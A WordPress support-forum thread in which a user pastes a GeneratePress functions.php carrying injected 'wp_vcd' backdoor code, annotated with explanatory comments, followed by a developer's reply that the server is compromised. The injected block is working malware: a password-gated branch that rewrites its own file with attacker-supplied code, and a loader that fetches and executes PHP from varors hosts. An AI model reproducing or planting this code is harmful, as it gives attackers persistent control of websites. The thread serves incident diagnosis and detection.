February 23, 2019 at 11:28 am #819057
Nasif
I'm seeing some weird code from the 1st to the 184th line of functions.php on my website, which I don't see in functions.php from the originally downloaded file:
<?php
// NOTE(review): the poster reports that the code from here down to the
// GeneratePress header is absent from the vendor copy of functions.php.
// Read it as injected code, not as part of the theme.
//
// Remote-control gate: the branch below runs when a request carries both an
// `action` and a `password` parameter and the password equals the hard-coded
// string. $_REQUEST merges GET and POST (and cookies, depending on the
// request_order / variables_order ini settings). No WordPress login, nonce or capability check is
// involved, and the code sits ahead of the theme's ABSPATH guard.
// Detection: the literals in this block (the password value, "wp_vcd", the
// error string printed by the default case) work as file-scan indicators, and
// requests carrying action=change_domain or action=change_code are worth
// searching for in the web server access logs.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '9fade7397d0710fa1b1b35e4f047467c'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
// 'change_domain': self-modifying step. Reads this file, captures the host
// name used by the first remote fetch further down, replaces every occurrence
// of that host with the request-supplied `newdomain`, and writes the file back.
// Consequence for responders: host names found in an infected file may differ
// from site to site, so match on the code structure, not only on the domains.
{case 'change_domain';
if (isset($_REQUEST['newdomain']))
{if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}}
}
}
// 'change_code': replaces whatever currently sits between the two
// wp_theme_tmp marker comments at the end of the injected section with the
// request-supplied `newcode` (after stripslashes) and writes the file back.
// The written text becomes part of functions.php, so it is executed as PHP on
// later requests: this is persistent remote code execution.
break;case 'change_code';
if (isset($_REQUEST['newcode']))
{if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}}
}
}
// Any other action value only prints a fixed error string.
break;default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
// die() ends the request here, so a request that passed the gate never reaches
// WordPress or the theme. The "@" prefixes above suppress PHP warnings, so
// failed reads or writes of this file are not reported by this code.
}die("");
}$div_code_name = "wp_vcd";
// Loader half of the injected code. On each request that loads this file it
// tries to download PHP from a remote host, executes it, and keeps a cached
// copy on disk to fall back on. $funcfile and $path are assigned but not
// referenced again in the visible code.
$funcfile = __FILE__;
// Presumably guards against redefining the helpers when another infected file
// has already loaded the same loader -- the visible code only shows the check.
if(!function_exists('theme_temp_setup')) {
// NOTE(review): REQUEST_URI is unquoted in the second index, so PHP resolves
// it as a constant name; PHP 8 raises an Error for an undefined constant, so
// this line can surface as a fatal error after a PHP upgrade.
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
// Requests whose URI contains wp-cron.php or xmlrpc.php skip the loader.
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {function file_get_contents_tcurl($url)
{
// cURL-based downloader used as a fallback for file_get_contents().
// It follows redirects and returns the response body (or false on failure).
// No certificate or content checks are configured here.
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}function theme_temp_setup($phpCode)
{
// Executes an arbitrary string as PHP: the string is written, prefixed with an
// opening PHP tag, to a temp file in the system temp directory (or in the
// current directory when that write fails), included, and then deleted.
// Forensics: the temp file is removed right after the include, so this step
// normally leaves no file behind; files named with the "theme_temp_setup"
// prefix may remain if a request aborted mid-way (not verifiable from here).
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
// Returns every variable defined in this function's scope after the include,
// which the callers below pass to extract().
return get_defined_vars();
}$wp_auth_key='506612fdd5cd54762092c0d136fa0792';
// $wp_auth_key is only a marker: a downloaded or cached payload is accepted
// when it contains this string anywhere (stripos). Nothing here authenticates
// the remote host, and every fetch uses plain http.
//
// Stage 1: first host, via file_get_contents() and then the cURL helper.
// On success the payload is executed (theme_temp_setup) and its variables are
// imported into the current scope (extract). A copy is then written to
// wp-includes/wp-tmp.php; if that file does not exist afterwards, the theme
// directory is tried, and then a relative wp-tmp.php in the working directory.
if (($tmpcontent = @file_get_contents("http://www.varors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.varors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}}
// Stage 2: second host, same execute-then-cache sequence (file_get_contents only).
}elseif ($tmpcontent = @file_get_contents("http://www.varors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}}
// Stage 3: third host, same sequence again.
}elseif ($tmpcontent = @file_get_contents("http://www.varors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}}
}
// Offline fallback: when no host answers, a previously cached wp-tmp.php is
// executed from the same three locations, in the same order.
// Cleanup: blocking the hosts or deleting only this block is not sufficient on
// its own terms -- all three wp-tmp.php locations need checking, and what the
// downloaded payload did while it ran cannot be determined from this file.
// Detection: outbound HTTP from the web server to the hosts above on ordinary
// page loads, and a wp-tmp.php in wp-includes or the theme directory.
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));}
}
// The two wp_theme_tmp marker comments that follow delimit the region that the
// change_code action overwrites; in this sample the region holds only a
// placeholder comment. After the markers, a closing and re-opening PHP tag
// joins the injected section to the original file.
}//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
/**
 * GeneratePress theme bootstrap.
 *
 * Do not edit this file directly; put customisations in a child theme.
 *
 * NOTE(review): per the post, the vendor copy of functions.php does not
 * contain the code found ahead of this header in the deployed copy, so
 * anything preceding it deserves scrutiny.
 *
 * @package GeneratePress
 */

// Stop when the file is requested directly instead of being loaded by WordPress.
defined( 'ABSPATH' ) || exit;

// Set our theme version.
define( 'GENERATE_VERSION', '2.2.2' );

if ( ! function_exists( 'generate_setup' ) ) {
    add_action( 'after_setup_theme', 'generate_setup' );

    /**
     * Declares the features this theme supports, its menu location, the
     * default content width and the editor stylesheet.
     *
     * Registered on the `after_setup_theme` hook above. Wrapped in a
     * function_exists() check, so a definition loaded earlier takes precedence.
     *
     * @since 0.1
     */
    function generate_setup() {
        // Argument sets for the features that take options.
        $post_formats = array( 'aside', 'image', 'video', 'quote', 'link', 'status' );
        $html5_markup = array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption' );
        $logo_options = array(
            'height' => 70,
            'width' => 350,
            'flex-height' => true,
            'flex-width' => true,
        );

        // Make theme available for translation.
        load_theme_textdomain( 'generatepress' );

        // Feature declarations, in the theme's original order.
        add_theme_support( 'automatic-feed-links' );
        add_theme_support( 'post-thumbnails' );
        add_theme_support( 'post-formats', $post_formats );
        add_theme_support( 'woocommerce' );
        add_theme_support( 'title-tag' );
        add_theme_support( 'html5', $html5_markup );
        add_theme_support( 'customize-selective-refresh-widgets' );
        add_theme_support( 'align-wide' );
        add_theme_support( 'editor-color-palette', array() );
        add_theme_support( 'responsive-embeds' );
        add_theme_support( 'custom-logo', $logo_options );

        // Register primary menu.
        $menu_locations = array(
            'primary' => __( 'Primary Menu', 'generatepress' ),
        );
        register_nav_menus( $menu_locations );

        // Start from a generous content width when none is set yet; a more
        // accurate value is set in generate_smart_content_width().
        global $content_width;
        if ( ! isset( $content_width ) ) {
            $content_width = 1200; /* pixels */
        }

        // This theme styles the visual editor to resemble the theme style.
        add_editor_style( 'css/admin/editor-style.css' );
    }
}

/**
 * Get all necessary theme files
 */
// Core theme includes, loaded in this fixed order on every request.
// `require` makes a missing file a fatal error rather than a silent skip.
// Every path is a literal under get_template_directory(); none of them is
// built from request input.
require get_template_directory() . '/inc/theme-functions.php';
require get_template_directory() . '/inc/defaults.php';
require get_template_directory() . '/inc/class-css.php';
require get_template_directory() . '/inc/css-output.php';
require get_template_directory() . '/inc/general.php';
require get_template_directory() . '/inc/customizer.php';
require get_template_directory() . '/inc/markup.php';
require get_template_directory() . '/inc/typography.php';
require get_template_directory() . '/inc/plugin-compat.php';
require get_template_directory() . '/inc/block-editor.php';
require get_template_directory() . '/inc/migrate.php';
require get_template_directory() . '/inc/deprecated.php';if ( is_admin() ) {
// Loaded only when is_admin() reports an admin-area request.
require get_template_directory() . '/inc/meta-box.php';
require get_template_directory() . '/inc/dashboard.php';
}/**
* Load our theme structure
*/
require get_template_directory() . '/inc/structure/archives.php';
require get_template_directory() . '/inc/structure/comments.php';
require get_template_directory() . '/inc/structure/featured-images.php';
require get_template_directory() . '/inc/structure/footer.php';
require get_template_directory() . '/inc/structure/header.php';
require get_template_directory() . '/inc/structure/navigation.php';
require get_template_directory() . '/inc/structure/post-meta.php';
require get_template_directory() . '/inc/structure/sidebars.php';
What is all this code, and what inserted it? Is this code an attempt to get access to my site? Should I be worried?
GeneratePress 2.2.2, GP Premium 1.7.8
February 23, 2019 at 5:23 pm #819282
Tom (Lead Developer)
Hi there,
That looks like your server has already been compromised.
A few of the many reasons this can happen are:
1. You’re using outdated plugins, themes or WordPress versions.
2. You’re using an outdated version of PHP.
3. You’re using a shared server and another site on the server is hacked.
The best thing you can do is report this to your hosting. It’s in their best interest to get it cleaned up ASAP.
Once they do that, you’ll want to change all of your passwords and make sure everything is up to date.
Documentation: http://docs.generatepress.com/
Adding CSS: http://docs.generatepress.com/article/adding-css/
Ongoing Development: https://generatepress.com/ongoing-development -